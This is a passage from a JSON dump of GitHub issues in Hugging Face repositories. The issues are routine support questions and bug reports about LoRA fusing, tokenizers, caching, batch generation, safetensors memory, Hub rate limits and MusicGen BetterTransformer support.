file:///C:/Users/username/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24152:13\r\n at Object.logger [as onLog] (file:///C:/Users/username/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:25825:9)\r\n at ModuleLoader.handleInvalidResolvedId (file:///C:/Users/rachel_shalom/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24738:26)\r\n at file:///C:/Usersusername/chat-ui/node_modules/rollup/dist/es/shared/node-entry.js:24698:26\r\n \r\n```\r\nHow do I externalize this module, and should I? Has anyone had this issue?", "url": "https://github.com/huggingface/chat-ui/issues/438", "state": "closed", "labels": [ "support" ], "created_at": "2023-09-14T11:21:35Z", "updated_at": "2023-09-14T12:08:00Z", "comments": 2, "user": "RachelShalom" }, { "repo": "huggingface/diffusers", "number": 5032, "title": "How to unfuse_lora only the first one after I have added multiple lora?", "body": "base.load_lora_weights(\"models/safetensors/SDXL/国风插画SDXL.safetensors\") \r\nbase.fuse_lora(lora_scale=.7)\r\nbase.load_lora_weights(\"models/safetensors/SDXL/sd_xl_offset_example-lora_1.0.safetensors\")\r\nbase.fuse_lora(lora_scale=.8)\r\nNow, when I execute unfuse_lora(), only the most recent one has been unfused.\r\n\r\nSo, how do I unfuse '国风插画SDXL.safetensors', or unfuse all LoRA weights?", "url": "https://github.com/huggingface/diffusers/issues/5032", "state": "closed", "labels": [ "stale" ], "created_at": "2023-09-14T08:10:46Z", "updated_at": "2023-10-30T15:06:34Z", "user": "yanchaoguo" }, { "repo": "huggingface/optimum", "number": 1384, "title": "Documentation Request: Table or heuristic for Ortmodel Method to Encoder/Decoder to .onnx File to Task", "body": "### Feature request\r\n\r\nHi there\r\n\r\nCould you provide either a table (where explicit rules apply - see attached image), or a heuristic, so I can tell which ML models, optimised file types, with which tasks, apply to which inference methods and inference tasks?\r\n\r\nThe example table below will help to clarify, and isn't necessarily prescriptive, because I may have mixed some concepts.\r\n\r\nIn case you mention, yes - I'm aware that it's possible to run a pipeline with the wrong model, and an error message will spit out all the accepted architectures/models (roberta, gpt, etc) for a method type. However,\r\na) this is very time-consuming, hit and miss, and \r\nb) these 'lists' don't explain the relationships to the underlying architectures and files.. (ie. model_merged, encoder-decoder, encoder only, decoder only, that result from the pytorch, safetensor files.)\r\n\r\nFor example, will all models exported/optimised for text-generation always be encoder-decoder and always use the ORTSeq2SeqModel method (for illustrative purposes), or will this depend on a combination of the original model architecture and the task applied during optimisation, which may result in one or more usable methods for inference?\r\n\r\nIt's a massive learning curve for me, but it seems it would be relatively straightforward to someone who works with this stuff. It probably just needs to go from peoples' heads into a document.\r\n\r\nThanks muchly! It'll be a massive time saver and help with conceptual understanding.\r\n\r\n### Motivation\r\n\r\nI'm trying to understand how to mix and match the models, optimisations, tasks, and inference methods.. Been trawling HF, ONNX, and general information but cannot find anything like this that exists, and it would save a BUNCH of testing trial and error time. 
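As a rough sketch of the heuristic being asked for (not official documentation, so treat the mapping as an approximation): the ORTModel class follows the exported architecture rather than the task string alone, so text-generation checkpoints are typically decoder-only and load with `ORTModelForCausalLM`, not a Seq2Seq class:

```python
from optimum.onnxruntime import (
    ORTModelForCausalLM,                # decoder-only (gpt2, llama): decoder_model(_merged).onnx
    ORTModelForSeq2SeqLM,               # encoder-decoder (t5, bart): encoder + decoder .onnx pair
    ORTModelForSequenceClassification,  # encoder-only + head (bert, roberta): model.onnx
)

# Illustrative task -> class correspondence, not exhaustive:
TASK_TO_ORT_CLASS = {
    "text-generation": ORTModelForCausalLM,
    "text2text-generation": ORTModelForSeq2SeqLM,
    "text-classification": ORTModelForSequenceClassification,
}
```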
(like I've wasted directly and indirectly almost a week of trialling and there's probably very simple rules for this)\r\n\r\nPart of the time wasted has been selecting models and running CLI command to optimise/quantize for a task, only to discover I have no idea with ORTModel method to use, as these don't relate to task but model architecture instead (or a combination of both), and brute forcing an understanding with testing and trying to come up with my own heuristics.\r\n\r\nMaybe this type of knowledge is assumed? but for newbs like me it's extremely daunting and feels like I may be trying to re-invent the wheel.\r\n\r\n### Your contribution\r\n(table for illustrative purposes.. the dummy data is wrong.. )\r\n\r\n![method-task-model-llm-matrix](https://github.com/huggingface/optimum/assets/83053994/d25adf44-8cff-4a63-a5c7-312636f1dbaf)\r\n", "url": "https://github.com/huggingface/optimum/issues/1384", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-14T01:45:38Z", "updated_at": "2025-04-24T02:11:24Z", "comments": 4, "user": "gidzr" }, { "repo": "huggingface/optimum", "number": 1379, "title": "Can't use bettertransformer to train vit?", "body": "### System Info\n\n```shell\nTraceback (most recent call last):\r\n File \"test_bettertransformer_vit.py\", line 95, in \r\n main()\r\n File \"test_bettertransformer_vit.py\", line 92, in main\r\n test_train_time()\r\n File \"test_bettertransformer_vit.py\", line 86, in test_train_time\r\n out_vit = model(pixel_values).last_hidden_state\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.8/site-packages/transformers/models/vit/modeling_vit.py\", line 587, in forward\r\n encoder_outputs = self.encoder(\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.8/site-packages/transformers/models/vit/modeling_vit.py\", line 413, in forward\r\n layer_outputs = layer_module(hidden_states, layer_head_mask, output_attentions)\r\n File \"/opt/conda/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/root/.local/lib/python3.8/site-packages/optimum/bettertransformer/models/encoder_models.py\", line 1186, in forward\r\n raise NotImplementedError(\r\nNotImplementedError: Training and Autocast are not implemented for BetterTransformer + ViT. 
Please open an issue.\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\ndef test_train_time():\r\n model = ViTModel.from_pretrained(model_pth).to('cuda')\r\n processor = ViTImageProcessor.from_pretrained(model_pth)\r\n pixel_values=clip_process(processor, pic_pth).cuda()\r\n if args.flash:\r\n model = model.to_bettertransformer()\r\n model.train()\r\n\r\n begin_time = time.time()\r\n for i in range(args.nums):\r\n out_vit = model(pixel_values).last_hidden_state\r\n\r\n print('use flash: {}, train vit time {:.2f}'.format(args.flash, time.time() - begin_time)) \n\n### Expected behavior\n\nnone", "url": "https://github.com/huggingface/optimum/issues/1379", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-13T12:49:53Z", "updated_at": "2025-02-20T08:38:26Z", "comments": 1, "user": "lijiaoyang" }, { "repo": "huggingface/text-generation-inference", "number": 1015, "title": "How to run text-generation-benchmark with a local tokenizer", "body": "The command I run in Docker is\r\n\r\n```\r\ntext-generation-benchmark --tokenizer-name /data/checkpoint-5600/\r\n```\r\n\r\nThe error log is\r\n\r\n```\r\n2023-09-12T11:22:01.245495Z INFO text_generation_benchmark: benchmark/src/main.rs:132: Loading tokenizer\r\n2023-09-12T11:22:01.245966Z INFO text_generation_benchmark: benchmark/src/main.rs:141: Downloading tokenizer\r\n2023-09-12T11:22:31.270784Z WARN cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 1957 milliseconds... \r\n2023-09-12T11:23:03.228297Z WARN cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 2202 milliseconds... \r\n2023-09-12T11:23:35.430766Z WARN cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 4671 milliseconds... \r\n2023-09-12T11:24:10.102170Z ERROR cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:555: Max retries exceeded for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json \r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: \"Model \\\"/data/checkpoint-5600/\\\" on the Hub doesn't have a tokenizer\"', benchmark/src/main.rs:153:78\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n``` \r\n\r\nI notice `Downloading tokenizer` in the error log, which is very strange because `/data/checkpoint-5600/` is my local model path. So I found the relevant source code:\r\n\r\nhttps://github.com/huggingface/text-generation-inference/blob/1f69fb9ed4fb91fe0bb9b94edda5729c67e6f02a/benchmark/src/main.rs#L134-L154\r\n\r\nBut I notice that there is only a `tokenizer_config.json` in my local model path, and no `tokenizer.json`. 
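(A possible fix, rather than renaming: `tokenizer_config.json` only holds configuration, while `tokenizer.json` is the serialized fast tokenizer that the benchmark looks for. If a fast tokenizer exists for this model family, re-saving generates it. A sketch:)

```python
from transformers import AutoTokenizer

# Loading with use_fast=True and re-saving writes tokenizer.json
# next to tokenizer_config.json in the checkpoint directory.
tokenizer = AutoTokenizer.from_pretrained("/data/checkpoint-5600/", use_fast=True)
tokenizer.save_pretrained("/data/checkpoint-5600/")
```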
And I see that it is the same as the Hub model, for example https://huggingface.co/openlm-research/open_llama_7b_v2/tree/main\r\n\r\nThen I tried to work around it by renaming `tokenizer_config.json` to `tokenizer.json` in my local model path, but it still doesn't work:\r\n\r\n```\r\n2023-09-12T11:29:52.461487Z INFO text_generation_benchmark: benchmark/src/main.rs:132: Loading tokenizer\r\n2023-09-12T11:29:52.462513Z INFO text_generation_benchmark: benchmark/src/main.rs:138: Found local tokenizer\r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: Error(\"expected `,` or `}`\", line: 2, column: 18)', benchmark/src/main.rs:139:69\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n```\r\n\r\nFinally, I want to know: are the `tokenizer_config.json` and `tokenizer.json` referred to here the same thing?", "url": "https://github.com/huggingface/text-generation-inference/issues/1015", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-12T12:10:41Z", "updated_at": "2024-06-07T09:39:32Z", "user": "jessiewiswjc" }, { "repo": "huggingface/autotrain-advanced", "number": 260, "title": "How to create instruction dataset (Q&A) for fine-tuning from PDFs?", "body": "", "url": "https://github.com/huggingface/autotrain-advanced/issues/260", "state": "closed", "labels": [], "created_at": "2023-09-12T02:54:07Z", "updated_at": "2023-12-18T15:31:13Z", "user": "mahimairaja" }, { "repo": "huggingface/transformers.js", "number": 295, "title": "[Question] Issue with deploying model to Vercel using NextJS and tRPC", "body": "Hi, I'm trying to deploy my model to Vercel via NextJS and tRPC and have the .cache folder generated using the postinstall script \r\n\r\n```\r\n// @ts-check\r\nlet fs = require(\"fs-extra\");\r\nlet path = require(\"path\");\r\n\r\nasync function copyXenovaToLocalModules() {\r\n const paths = [[\"../../../node_modules/@xenova\", \"../node_modules/@xenova\"]];\r\n\r\n for (const pathTuple of paths) {\r\n const [src, dest] = [\r\n path.join(__dirname, pathTuple[0]),\r\n path.join(__dirname, pathTuple[1]),\r\n ];\r\n await fs.remove(dest).catch(() => {});\r\n await fs.copy(src, dest).catch(() => {});\r\n\r\n // Create .cache folder for dest paths\r\n\r\n const cacheDir = path.join(dest, \"transformers\", \".cache\");\r\n await fs.mkdir(cacheDir).catch(() => {});\r\n }\r\n}\r\n\r\ncopyXenovaToLocalModules();\r\n\r\n```\r\nWhen I run this, I get the following error: \r\n\r\n```\r\nenv {\r\n backends: {\r\n onnx: { wasm: [Object], webgl: {}, logLevelInternal: 'warning' },\r\n tfjs: {}\r\n },\r\n __dirname: '/vercel/path0/packages/api/node_modules/@xenova/transformers',\r\n version: '2.5.4',\r\n allowRemoteModels: true,\r\n remoteHost: 'https://huggingface.co/',\r\n remotePathTemplate: '{model}/resolve/{revision}/',\r\n allowLocalModels: true,\r\n localModelPath: '/vercel/path0/packages/api/node_modules/@xenova/transformers/models/',\r\n useFS: true,\r\n useBrowserCache: false,\r\n useFSCache: true,\r\n cacheDir: '/vercel/path0/packages/api/node_modules/@xenova/transformers/.cache/',\r\n useCustomCache: false,\r\n customCache: null\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: '/vercel'\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: 
'/vercel'\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: '/vercel'\r\n}\r\n``` \r\nCan someone help me with this? ", "url": "https://github.com/huggingface/transformers.js/issues/295", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-11T11:13:11Z", "updated_at": "2023-09-12T15:23:17Z", "user": "arnabtarwani" }, { "repo": "huggingface/transformers.js", "number": 291, "title": "[Question] Using transformers.js inside an Obsidian Plugin", "body": "I'm trying to run transfomer.js inside of Obsidian but running into some errors:\r\n\"Screenshot\r\n\r\n\r\nThis code is triggering the issues:\r\n```js\r\n\r\nclass MyClassificationPipeline {\r\n\tstatic task = \"text-classification\";\r\n\tstatic model = \"Xenova/distilbert-base-uncased-finetuned-sst-2-english\";\r\n\tstatic instance = null;\r\n\r\n\tstatic async getInstance(progress_callback = null) {\r\n\t\tif (this.instance === null) {\r\n\t\t\t// Dynamically import the Transformers.js library\r\n\t\t\tconsole.log('before import')\r\n\t\t\tlet { pipeline, env } = await import(\"@xenova/transformers\");\r\n\t\t\tconsole.log('after import')\r\n\r\n\t\t\t// NOTE: Uncomment this to change the cache directory\r\n\t\t\t// env.cacheDir = './.cache';\r\n\r\n\t\t\tthis.instance = pipeline(this.task, this.model, {\r\n\t\t\t\tprogress_callback,\r\n\t\t\t});\r\n\t\t}\r\n\r\n\t\treturn this.instance;\r\n\t}\r\n}\r\nexport default MyClassificationPipeline;\r\n\r\n// Comment out this line if you don't want to start loading the model as soon as the server starts.\r\n// If commented out, the model will be loaded when the first request is received (i.e,. lazily).\r\n// MyClassificationPipeline.getInstance();\r\n```\r\n[Link to source](https://github.com/different-ai/obsidian-ml/blob/master/embeddings.js)\r\n\r\n[These are the lines that are calling the code above](https://github.com/different-ai/obsidian-ml/blob/0bd169c6e0c3f385e7238a78c585932fe0320bc9/hello.js#L27-L29)\r\n\r\n\r\n\r\nContext about Obsidian plugins:\r\n- Obsidian plugin is just a single imported js file.\r\n- Most of the time it's bundled using esbuild.\r\n\r\nIn my case, this is [my esbuild setup](https://github.com/different-ai/obsidian-ml/blob/master/esbuild.config.mjs)\r\n\r\n----\r\n\r\nHow should I be tackling this, what would be the recommended way to bundle transformer.js?\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/291", "state": "open", "labels": [ "question" ], "created_at": "2023-09-10T22:12:07Z", "updated_at": "2024-04-30T13:52:06Z", "user": "benjaminshafii" }, { "repo": "huggingface/candle", "number": 807, "title": "How to use the kv_cache?", "body": "Hi, how would I use the kv_cache? Let's say I want a chat like type of thing, how would I save the kv_cache and load it so that all the tokens won't have to be computed again?", "url": "https://github.com/huggingface/candle/issues/807", "state": "closed", "labels": [], "created_at": "2023-09-10T21:39:31Z", "updated_at": "2025-11-22T23:18:58Z", "user": "soupslurpr" }, { "repo": "huggingface/transformers", "number": 26061, "title": "How to perform batch inference? ", "body": "### Feature request\n\nI want to pass a list of tests to model.generate. 
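\r\n\r\nFor reference, a minimal batched-generation sketch (the model name and texts here are illustrative, not from this report): the key points are tokenizing the whole list with padding enabled, and left-padding for causal LMs so generation continues from real tokens.\r\n\r\n```python\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\nmodel_name = \"gpt2\"  # illustrative; any causal LM works the same way\r\ntokenizer = AutoTokenizer.from_pretrained(model_name)\r\ntokenizer.pad_token = tokenizer.eos_token  # GPT-2 has no pad token by default\r\ntokenizer.padding_side = \"left\"  # left-pad so new tokens extend the real text\r\nmodel = AutoModelForCausalLM.from_pretrained(model_name).to(0)\r\n\r\ntexts = [\"hey there\", \"how are you today?\"]\r\ninputs = tokenizer(texts, return_tensors=\"pt\", padding=True).to(0)\r\nout = model.generate(**inputs, max_new_tokens=32, pad_token_id=tokenizer.eos_token_id)\r\nprint(tokenizer.batch_decode(out, skip_special_tokens=True))\r\n```\r\n\r\nThe single-input version currently in use: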
\r\n\r\ntext = \"hey there\"\r\ninputs = tokenizer(text, return_tensors=\"pt\").to(0)\r\n\r\nout = model.generate(**inputs, max_new_tokens=184)\r\nprint(tokenizer.decode(out[0], skip_special_tokens=True))\r\n\r\n\r\n\n\n### Motivation\n\nI want to do batch inference. \n\n### Your contribution\n\nTesting", "url": "https://github.com/huggingface/transformers/issues/26061", "state": "closed", "labels": [], "created_at": "2023-09-08T20:59:37Z", "updated_at": "2023-10-23T16:04:20Z", "user": "ryanshrott" }, { "repo": "huggingface/text-generation-inference", "number": 998, "title": "How to insert a custom stop symbol, like
?", "body": "### Feature request\n\nnothing\n\n### Motivation\n\nnothing\n\n### Your contribution\n\nnothing", "url": "https://github.com/huggingface/text-generation-inference/issues/998", "state": "closed", "labels": [], "created_at": "2023-09-08T07:06:08Z", "updated_at": "2023-09-08T07:13:38Z", "user": "babytdream" }, { "repo": "huggingface/safetensors", "number": 355, "title": "Safe tensors cannot be easily freed!", "body": "### System Info\n\nHi, \r\n\r\nI am using the safetensors for loading Falcon-180B model. I am loading the ckpts one by one on CPU, and then try to remove the tensors by simply calling `del` function. However, I am seeing that CPU memory keeps increasing until it runs out of memory and system crashes (I am also calling `gc.collect()` after deleting tensors). Is there any good way to release the safetensor memory.\r\nThanks,\r\nReza\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\n```\r\nfrom safetensors.torch import load_file\r\nsd_ = load_file(ckpt_path)\r\nlens = len(sd_.keys())\r\nfor _ in range(lens):\r\n data = sd_.popitem()\r\n del data\r\ndel sd_\r\ngc.collect()\r\n```\n\n### Expected behavior\n\nrelease the memory after calling `gc.collect()`", "url": "https://github.com/huggingface/safetensors/issues/355", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-07T22:13:15Z", "updated_at": "2024-08-30T10:22:01Z", "comments": 4, "user": "RezaYazdaniAminabadi" }, { "repo": "huggingface/transformers.js", "number": 285, "title": "The generate API always returns the same number of tokens as output nomatter what is min_tokens", "body": "Here is the code I am trying\r\n```js\r\nimport { pipeline } from '@xenova/transformers';\r\nimport { env } from '@xenova/transformers';\r\n\r\n\r\nlet generator = await pipeline('text2text-generation', 'Xenova/LaMini-Flan-T5-783M');\r\nlet output = await generator('write a blog on Kubernetes?', {\r\n max_new_tokens: 512,min_new_tokens:512,min_length:300\r\n});\r\n\r\nconsole.log(output)\r\n```\r\nSo no matter whatever is min_new_tokens or min_length (even if I try one of them only), output just remains same length", "url": "https://github.com/huggingface/transformers.js/issues/285", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-07T13:30:39Z", "updated_at": "2023-09-17T21:57:14Z", "user": "allthingssecurity" }, { "repo": "huggingface/chat-ui", "number": 430, "title": "Server does not support event stream content error for custom endpoints", "body": "is there anyone faced the issue such as \"Server does not support event stream content\" when parsing the custom endpoint results.\r\nwhat is the solution for this error?\r\n\r\nIn order to reproduce the issue,\r\nUser enter prompts saying \"how are you\" -> call goes to custom endpoint -> Endpoint returns response as string -> error popsup \"Server does not support event stream content\"", "url": "https://github.com/huggingface/chat-ui/issues/430", "state": "closed", "labels": [], "created_at": "2023-09-07T10:01:18Z", "updated_at": "2023-09-15T00:01:56Z", "comments": 3, "user": "nandhaece07" }, { "repo": "huggingface/sentence-transformers", "number": 2300, "title": "How to convert embedding vector to text \uff1f", "body": "I use the script below to convert text to embeddings \r\n```\r\nmodel = SentenceTransformer('all-MiniLM-L6-v2')\r\nembeddings = model.encode(text)\r\n```\r\n\r\nBut how to convert embeddings to text \uff1f", "url": 
"https://github.com/huggingface/sentence-transformers/issues/2300", "state": "closed", "labels": [], "created_at": "2023-09-07T09:19:22Z", "updated_at": "2025-09-01T11:44:34Z", "user": "chengzhen123" }, { "repo": "huggingface/transformers.js", "number": 283, "title": "[Question] Model type for tt/ee not found, assuming encoder-only architecture", "body": "Reporting this as requested by the warning message, but as a question because I'm not entirely sure if it's a bug:\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/1167575/f40d5935-01b4-442e-802b-ed5fd7a774b7)\r\n\r\nHere's the code I ran:\r\n\r\n```js\r\nlet quantized = false; // change to `true` for a much smaller model (e.g. 87mb vs 345mb for image model), but lower accuracy\r\nlet { AutoProcessor, CLIPVisionModelWithProjection, RawImage, AutoTokenizer, CLIPTextModelWithProjection } = await import('https://cdn.jsdelivr.net/npm/@xenova/transformers@2.5.4/dist/transformers.min.js');\r\nlet imageProcessor = await AutoProcessor.from_pretrained('Xenova/clip-vit-base-patch16');\r\nlet visionModel = await CLIPVisionModelWithProjection.from_pretrained('Xenova/clip-vit-base-patch16', {quantized});\r\nlet tokenizer = await AutoTokenizer.from_pretrained('Xenova/clip-vit-base-patch16');\r\nlet textModel = await CLIPTextModelWithProjection.from_pretrained('Xenova/clip-vit-base-patch16', {quantized});\r\n\r\nfunction cosineSimilarity(A, B) {\r\n if(A.length !== B.length) throw new Error(\"A.length !== B.length\");\r\n let dotProduct = 0, mA = 0, mB = 0;\r\n for(let i = 0; i < A.length; i++){\r\n dotProduct += A[i] * B[i];\r\n mA += A[i] * A[i];\r\n mB += B[i] * B[i];\r\n }\r\n mA = Math.sqrt(mA);\r\n mB = Math.sqrt(mB);\r\n let similarity = dotProduct / (mA * mB);\r\n return similarity;\r\n}\r\n\r\n// get image embedding:\r\nlet image = await RawImage.read('https://i.imgur.com/RKsLoNB.png');\r\nlet imageInputs = await imageProcessor(image);\r\nlet { image_embeds } = await visionModel(imageInputs);\r\nconsole.log(image_embeds.data);\r\n\r\n// get text embedding:\r\nlet texts = ['a photo of an astronaut'];\r\nlet textInputs = tokenizer(texts, { padding: true, truncation: true });\r\nlet { text_embeds } = await textModel(textInputs);\r\nconsole.log(text_embeds.data);\r\n\r\nlet similarity = cosineSimilarity(image_embeds.data, text_embeds.data);\r\nconsole.log(similarity);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/283", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-07T05:01:34Z", "updated_at": "2023-09-08T13:17:07Z", "user": "josephrocca" }, { "repo": "huggingface/safetensors", "number": 354, "title": "Is it possible to append to tensors along a primary axis?", "body": "### Feature request\n\nit would be really cool to be able to append to a safetensor file so you can continue to add data along, say, a batch dimension\n\n### Motivation\n\nfor logging data during train runs that can be visualized from an external tool. something like a live application that lazily loads the saved data. 
this is super useful for reinforcement learning\n\n### Your contribution\n\ni could submit a PR if necessary.", "url": "https://github.com/huggingface/safetensors/issues/354", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-06T17:54:56Z", "updated_at": "2023-12-11T01:48:44Z", "comments": 2, "user": "verbiiyo" }, { "repo": "huggingface/huggingface_hub", "number": 1643, "title": "We couldn't connect to 'https://huggingface.co/' to load this model and it looks like distilbert-base-uncased is not the path to a directory conaining a config.json file. Checkout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.", "body": "### System Info\r\n\r\nHello, I have been using hugging face transformers with a lot of success. I have been able to create many successful fine-tuned pre-trained text classification models using various HF transformers and have been using HF integration with SageMaker in a SageMaker conda_pytorch_310 notebook. \r\n\r\n\r\nmy code looks like this: \r\n```!pip install \"transformers==4.17.0\" \"datasets[s3]==1.18.4\" --upgrade```\r\n``` tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)```\r\n\r\n\r\nYesterday I was able to successfully download, fine tune and make inferences using distilbert-base-uncased, and today I am getting: ```OSError: We couldn't connect to 'https://huggingface.co/' to load this model and it looks like mattmdjaga/segformer_b2_clothes is not the path to a directory conaining a config.json file.\r\nCheckout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.```\r\n\r\nLooking through the traceback I see: ```HTTPError: 429 Client Error: Too Many Requests for url: https://huggingface.co/mattmdjaga/segformer_b2_clothes/resolve/main/config.json\r\nDuring handling of the above exception, another exception occurred:```\r\n....\r\n ```File ~/anaconda3/envs/pytorch_p310/lib/python3.10/site-packages/transformers/file_utils.py:2052, in _raise_for_status(request) 2050 raise RevisionNotFoundError((f\"404 Client Error: Revision Not Found for url: {request.url}\"))-> 2052 request.raise_for_status()```\r\n\r\nI have tried many different models, both text classification and non-text classification and getting the same error. This worked yesterday and nothing has changed since then. 
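\r\n\r\n(An aside that may help while the rate limit lasts, hedged: if the files are already in the local cache from the earlier successful runs, offline mode skips the Hub HTTP calls that are returning 429. `TRANSFORMERS_OFFLINE` is the switch documented on the offline-mode page the error links to.)\r\n\r\n```python\r\nimport os\r\n\r\n# must be set before transformers is imported\r\nos.environ[\"TRANSFORMERS_OFFLINE\"] = \"1\"\r\n\r\nfrom transformers import AutoTokenizer\r\n\r\n# resolves from the local cache only; no request is sent to huggingface.co\r\ntokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\r\n```\r\n\r\n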
I also have confirmed that nothing has changed on our end to cause this error ,and confirmed all the model names.\r\n\r\nAny insights would be appreciated!\r\n\r\n@Wauplin \r\n\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(tokenizer_name)\r\n\r\n\r\n### Expected behavior\r\n\r\nmodel successfully downloads", "url": "https://github.com/huggingface/huggingface_hub/issues/1643", "state": "closed", "labels": [], "created_at": "2023-09-06T17:18:45Z", "updated_at": "2023-09-07T15:51:12Z", "user": "a-rhodes-vcu" }, { "repo": "huggingface/setfit", "number": 417, "title": "Passing multiple evaluation metrics to SetFitTrainer", "body": "Hi there, after reading the docs I find that one can easily get the f1 score or accuracy by passing the respective string as the `metric` argument to the trainer. However, how can I get both or even other metrics, such as f1_per_class?\r\n\r\nThanks :)", "url": "https://github.com/huggingface/setfit/issues/417", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-06T11:38:08Z", "updated_at": "2023-11-24T13:31:08Z", "user": "fhamborg" }, { "repo": "huggingface/optimum", "number": 1357, "title": "[RFC] MusicGen `.to_bettertransformer()` integration", "body": "### Feature request\n\nAdd support for MusicGen Better Transformer integration. MusicGen is composed of three sub-models:\r\n\r\n1. Text encoder: maps the text inputs to a sequence of hidden-state representations. The pre-trained MusicGen models use a frozen text encoder from either T5 or Flan-T5\r\n2. MusicGen decoder: a language model (LM) that auto-regressively generates audio tokens (or codes) conditional on the encoder hidden-state representations. The pre-trained MusicGen models use the BART decoder structure\r\n3. Audio codec: used to encode an audio prompt to use as prompt tokens, and recover the audio waveform from the audio tokens predicted by the decoder. The pre-trained MusicGen models use the [EnCodec model](https://huggingface.co/docs/transformers/main/model_doc/encodec)\r\n\r\n=> the text encoder uses the T5 attention module, and the MusicGen decoder uses the BART attention module. Thus, there are no extra attention layers we need to add to optimum. The audio codec is not transformer based, so we don't need to export it to better transformer.\r\n\r\nThe question is simply how to get the integration working with the sub-model structure. The config file for MusicGen is nested in the same way as the model structure, containing sub-configs for each of the three components: https://huggingface.co/docs/transformers/main/model_doc/musicgen#transformers.MusicgenConfig \r\n\r\n=> this means that the text encoder config is accessed as `config.text_encoder`, and the text encoder model as `model.text_encoder`. Likewise, the MusicGen decoder config is accessed as `config.decoder`, and the text encoder model as `model.decoder`. We need to export the pairs of {models, configs} to their better transformer counterparts, e.g. 
{`model.text_encoder`, `config.text_encoder`} -> `better_transformer_text_encoder`, and {`model.decoder`, `config.decoder`} -> `better_transformer_decoder`.\r\n\r\nIdeally, we'd like to be able to export the entire model to better transformer in one go:\r\n```python\r\nfrom transformers import MusicgenForConditionalGeneration\r\n\r\nmodel = MusicgenForConditionalGeneration.from_pretrained(\"facebook/musicgen-small\")\r\nmodel = model.to_bettertransformer()\r\n```\r\n\r\nHowever, we can't simply export {`model`, `config`} like this, since the top-level config does not contain the config attributes for the sub-models. It's just a placeholder for the sub-model configs.\r\n\r\nA simple workaround is to export the text encoder and decoder separately:\r\n```python\r\nfrom transformers import MusicgenForConditionalGeneration\r\n\r\nmodel = MusicgenForConditionalGeneration.from_pretrained(\"facebook/musicgen-small\")\r\nmodel.text_encoder = model.text_encoder.to_bettertransformer()\r\nmodel.decoder = model.decoder.to_bettertransformer()\r\n```\r\n=> but this diverges from the better transformer API\n\n### Motivation\n\n~9M MusicGen [downloads](https://huggingface.co/models?search=facebook/musicgen) per month -> huge interest in running the model!\n\n### Your contribution\n\nHappy to help with the integration!", "url": "https://github.com/huggingface/optimum/issues/1357", "state": "closed", "labels": [], "created_at": "2023-09-06T10:25:50Z", "updated_at": "2024-01-10T17:31:44Z", "comments": 1, "user": "sanchit-gandhi" }, { "repo": "huggingface/diffusers", 